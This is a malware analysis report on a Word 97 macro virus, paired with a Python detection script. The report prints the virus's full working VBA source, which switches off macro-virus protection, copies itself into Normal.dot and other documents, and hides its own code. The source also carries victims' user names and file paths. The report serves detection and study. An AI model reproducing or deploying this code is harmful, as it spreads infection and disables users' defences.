Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e5122156a3c971a7…

MALICIOUS

Office (OLE)

Size: 35.5 KB
Created: 2000-04-26 10:56:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: ad0ae8303a4b1c3603019ce019b26457
SHA-1: 2bcf67b5ac230297ae1db17a7d857c63ba22d0b8
SHA-256: e5122156a3c971a7bbbf858e5d4f0e680c3fdd395c77387ab271203a66c2aeb6
Risk score: 188

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Note: nothing in the extracted script writes to the registry or to a Startup folder. The persistence actually observed is infection of the global Normal template, which ATT&CK catalogs as T1137.001 (Office Application Startup: Office Template Macros); the T1547.001 tag does not match the behaviour in the script.

The sample is a Word 97 (Word 8.0) document whose ThisDocument module carries an AutoOpen procedure. When the document is opened, the macro first switches off Word's macro-virus warning (Options.VirusProtection = False) and the prompt to save Normal.dot (Options.SaveNormalPrompt = False). It then reads line 2 of the first code module in both the global Normal template and the active document through the VBE object model; the comment 'Opps! on that line is the virus's infection marker, and the two checks decide the direction of infection. If only the document carries the marker, the whole module is copied into the Normal template with line 1 rewritten to Sub AutoClose() and line 35 rewritten to Sub ToolsMacro(); if only Normal carries it, the module is copied back into the active document with Sub AutoOpen() on line 1 and Sub ViewVBCode() on line 35. Line 35 is an empty procedure, so renaming it to ToolsMacro or ViewVBCode overrides the built-in Tools > Macro and View Code commands with a no-op. That is a stealth trick to keep the user from opening the macro editor, not persistence in itself; persistence comes from the infected Normal template, whose AutoClose copy runs every time a document is closed. After copying, the macro appends a comment containing the current user name, the time and the full path of the infected file, then saves the document in place; the comment block at the end of the extracted script is this infection trail, and its last entries (26 April 2000, a path under C:\NV) agree with the OLE creation date of the sample. The only payload beyond replication is a message box reading "lA-cOsA tE eSPiA!" (Spanish, roughly "the thing is spying on you") shown when the date is 30 December. Note the On Error GoTo Out handler: on a Word version where programmatic access to the VBProject is blocked, the replication fails silently and only the December 30 message box remains.

Heuristics (5)

  • ClamAV: Doc.Trojan.Class-43 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-43
  • VBA macros detected (medium) OLE_VBA_MACROS
    Document contains VBA macro code (two related findings follow).
  • VBA macro-virus self-replication / AV tampering (critical) OLE_VBA_MACRO_VIRUS_REPLICATION
    The VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behaviour of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    Options.VirusProtection = False
  • AutoOpen macro (low) OLE_VBA_AUTOOPEN
    Document contains an AutoOpen macro, which Word runs automatically when the document is opened.
    Matched line in script:
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers (high) OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them. In this sample the ToolsMacro string comes from the decoded VBA source itself (LineaX = "Sub ToolsMacro()"), so the finding reflects the override of the built-in Tools > Macro command rather than a hidden WordBasic macro.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2726 bytes
SHA-256: c27cd4f24c0b46629639ae3806351062de393aed9cc92f37b88459b4b9e17656

Extracted script (the page shows the first 1,000 lines). The Attribute lines at the top are module metadata stored with the source and are not visible in the VBE code module; that is why the replication code treats Sub AutoOpen() as line 1 and 'Opps! as line 2.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'Opps!
On Error GoTo Out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) = "'Opps!" Then NoTe = True Else NoTe = False
If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) = "'Opps!" Then AcWi = True Else AcWi = False
If AcWi = True And NoTe = False Then
    Set Source = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    Set Destin = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    Linea1 = "Sub Auto" & "Close()"
    LineaX = "Sub ToolsMacro()"
Else
    If AcWi = False And NoTe = True Then
        Set Source = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
        Set Destin = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
        Linea1 = "Sub Auto" & "Open()"
        LineaX = "Sub ViewVBCode()"
    Else
        GoTo Out
    End If
End If
Destin.DeleteLines 1, Destin.CountOfLines
Destin.InsertLines 1, Linea1
For I = 2 To Source.CountOfLines
    Destin.InsertLines I, Source.Lines(I, 1)
Next I
Destin.Replaceline 35, LineaX
Destin.InsertLines (Source.CountOfLines + 1), "'" & Application.UserName & " " & Now & " " & ActiveDocument.FullName
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Out:
If Day(Now) = 30 And Month(Now) = 12 Then MsgBox "lA-cOsA tE eSPiA!", 0, "Opps!"
End Sub
Sub ViewVBCode()
End Sub
'Start Opps! in the World 16/10/99 00:00:00 p.m. -

'Dra. Taratuto 1/01/97 0:53:47 A:\opps.doc
'Dra. Taratuto 2/03/2000 0:05:52 Document2
'USER10 7/03/2000 14:16:18 A:\Document2.doc
'USER10 8/03/2000 11:17:27 A:\www.doc
'OPEN NAUTAS 08/03/2000 11:18:01 A:\www.doc
'OPEN NAUTAS 11/03/2000 1:21:50 A:\REJUNTE.doc
'CIMADRID 14/03/2000 14:22:55 A:\REJUNTE.doc
'CIMADRID 14/03/2000 14:42:15 C:\Mis documentos\Indonesian Project.doc
'CIMADRID 14/03/2000 14:55:58 C:\Mis documentos\Indonesian Project.doc
'CIMADRID 14/03/2000 15:26:01 C:\Mis documentos\INDONESIA DANY.doc
'belen-r 14/03/00 18:16:17 C:\JSarte Indonesia\INDONESIA DANY MARCH 14.doc
'belen-r 16/03/00 16:46:00 U:\ANGELES\Lazagha.doc
'Mª de los Angeles Gil 16/03/00 16:46:27 U:\ANGELES\LAZAGHA.DOC
'Mª de los Angeles Gil 22/03/00 10:30:27 \\KATTY\SYS\USUARIOS\EDUCA\ANGELES\THAILAND.DOC
'GOAT 22/01/2000 2:58:29 PM C:\Virus\THAILAND.DOC
'Ditry PC 4/26/2000 11:56:03 AM C:\NV\W97MLACO.DT
'Ditry PC 4/26/2000 11:56:16 AM C:\NV\sample1.doc
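The checks described in the heuristics section, plus a parser for the infection trail the replication routine appends, as an added example in Python. This is not the report's own scanner and not oletools code; it runs plain regular expressions over decoded VBA text such as the macros.bas artifact above. Heuristic names and severities are copied from the report; the trail-comment layout (user name, Now, full path) is inferred from the InsertLines call in the script; SAMPLE is a constructed excerpt of the script shown on this page, and the ViewVBCode marker is an addition for this sample that the report's marker list does not name.

```python
"""Macro-virus triage of decoded VBA source. Added example, not the report's
scanner and not oletools code: it applies the report's heuristics (auto-exec
procedures, VBE object-model self-replication, Options.VirusProtection tampering,
legacy WordBasic command names) as regular expressions and parses the infection
trail the virus appends. SAMPLE is a constructed excerpt of the script above."""
import re
from typing import Dict, List, Tuple

# Procedures Word runs on its own (VBA and legacy WordBasic names).
AUTOEXEC = re.compile(
    r"\bSub\s+(AutoOpen|AutoClose|AutoExec|AutoExit|AutoNew|Document_Open|Document_Close)\s*\(",
    re.I)
# VBE object-model members that read or rewrite macro code: self-replication.
VBE_REPLICATION = re.compile(
    r"\b(VBProject|VBComponents|CodeModule|InsertLines|DeleteLines|ReplaceLine"
    r"|AddFromString|OrganizerCopy)\b", re.I)
# Word 97 macro-virus warning switched off.
AV_TAMPER = re.compile(r"\bOptions\s*\.\s*VirusProtection\s*=\s*False\b", re.I)
# Built-in command names a virus overrides to hide itself. ViewVBCode is an
# assumption added for this sample; the report's marker list does not name it.
WORDBASIC_MARKERS = re.compile(
    r"\b(ToolsMacro|MacroFile|fileMacro|globMacro|ViewVBCode)\b", re.I)
# Trail comment written after each infection: 'user  d/m/yy h:mm:ss [AM|PM]  path
TRAIL = re.compile(
    r"^'(?P<user>.+?)\s+"
    r"(?P<when>\d{1,2}/\d{1,2}/\d{2,4}\s+\d{1,2}:\d{2}:\d{2}(?:\s*(?:AM|PM|a\.m\.|p\.m\.))?)\s+"
    r"(?P<path>\S.*?)\s*$", re.I)

# Heuristic name and severity as used in the report, with the pattern(s) behind it.
HEURISTICS = (
    ("OLE_VBA_AUTOOPEN", "low", AUTOEXEC),
    ("OLE_VBA_MACRO_VIRUS_REPLICATION", "critical", VBE_REPLICATION),
    ("OLE_VBA_MACRO_VIRUS_REPLICATION", "critical", AV_TAMPER),
    ("OLE_LEGACY_WORDBASIC_MACRO_VIRUS", "high", WORDBASIC_MARKERS),
)
RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}


def triage_vba(src: str) -> Dict[str, List[Tuple[int, str]]]:
    """Map each heuristic that fires to the (line number, line) pairs behind it.
    Comment lines are skipped: a marker inside a comment cannot execute, and the
    trail comments at the end of this sample would otherwise be noise."""
    hits: Dict[str, List[Tuple[int, str]]] = {}
    for n, raw in enumerate(src.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("'"):
            continue
        for name, _sev, pat in HEURISTICS:
            if pat.search(line):
                entries = hits.setdefault(name, [])
                if (n, line) not in entries:  # two patterns may share one name
                    entries.append((n, line))
    return hits


def verdict(hits: Dict[str, List[Tuple[int, str]]]) -> str:
    """MALICIOUS on any critical finding, SUSPICIOUS on high/medium, else CLEAN.
    AutoOpen alone stays low: plenty of benign templates use it."""
    severity = {name: sev for name, sev, _ in HEURISTICS}
    worst = max((RANK[severity[name]] for name in hits), default=0)
    if worst >= RANK["critical"]:
        return "MALICIOUS"
    if worst >= RANK["medium"]:
        return "SUSPICIOUS"
    return "CLEAN"


def infection_trail(src: str) -> List[Tuple[str, str, str]]:
    """Recover (user, timestamp, path) for every infection the virus logged."""
    trail: List[Tuple[str, str, str]] = []
    for raw in src.splitlines():
        m = TRAIL.match(raw.strip())
        if m:
            trail.append((m["user"].strip(), m["when"], m["path"]))
    return trail


# Constructed excerpt of the extracted script on this page (not the full artifact).
SAMPLE = r"""Sub AutoOpen()
'Opps!
On Error GoTo Out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) = "'Opps!" Then NoTe = True Else NoTe = False
    Set Destin = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    LineaX = "Sub ToolsMacro()"
Destin.DeleteLines 1, Destin.CountOfLines
Destin.InsertLines 1, Linea1
Destin.Replaceline 35, LineaX
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Out:
End Sub
Sub ViewVBCode()
End Sub
'Dra. Taratuto 1/01/97 0:53:47 A:\opps.doc
'CIMADRID 14/03/2000 14:42:15 C:\Mis documentos\Indonesian Project.doc
'Ditry PC 4/26/2000 11:56:16 AM C:\NV\sample1.doc
"""

if __name__ == "__main__":
    found = triage_vba(SAMPLE)
    for name, lines in found.items():
        print(f"{name}: lines {[n for n, _ in lines]}")
    print("verdict:", verdict(found))
    for user, when, path in infection_trail(SAMPLE):
        print(f"{user} infected {path} at {when}")
```

Two design choices worth noting: comment lines are ignored when scoring, so the marker names sitting in the trail or in the 'Opps! comment never trip a rule on their own, and an AutoOpen procedure by itself only contributes a low finding, so a document with nothing but AutoOpen comes out CLEAN. The trail parser deliberately keeps the timestamp as text, because the entries mix day-first and month-first locales and a naive date parse would silently mis-order them.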